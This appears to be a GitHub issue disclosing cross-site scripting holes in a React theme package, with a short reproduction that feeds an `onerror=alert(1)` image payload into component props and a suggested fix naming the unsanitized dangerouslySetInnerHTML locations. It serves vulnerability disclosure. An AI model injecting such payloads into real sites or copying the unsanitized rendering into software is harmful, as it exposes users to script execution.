Skip to content

XSS vulnerabilities in the theme package #676

New issue
New issue
Open
Open
XSS vulnerabilities in the theme package#676
@gtsp233

Description

@gtsp233
gtsp233
opened on Jan 20, 2024

Hi, I've found four Cross-Site Scripting (XSS) vulnerabilities in the theme package.

Vulnerability Details:

  • Severity: High/Critical
  • Description: There's a risk of malicious script execution when the input to components are controlled by an adversory.

Steps to Reproduce:

import React from "react";
import {
  PageContainer,
  CheckoutContainer,
  IndexContainer,
  SharedContainer,
} from "theme";

function App() {
  return (
    <div>
      <PageContainer
        state={{
          productDetails: {
            description: `<img src='' onerror=alert(1)`,
          },
        }}
      />
      <CheckoutContainer
        state={{
          pageDetails: {
            description: `<img src='' onerror=alert(1)`,
          },
        }}
      />
      pageDetails
    </div>
  );
}

const root = ReactDOM.createRoot(document.getElementById("root"));
root.render(<App />);

Suggested Fix or Mitigation:
Sanitize the HTML before rendering with dangerouslySetInnerHTML. To fix all of the four vulnerabilities, sanitize the HTML at the following locations:
components/checkoutSuccess.js line 117
containers/index.js line 32
components/productDetails/index.js line 21
containers/page.js line 32

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions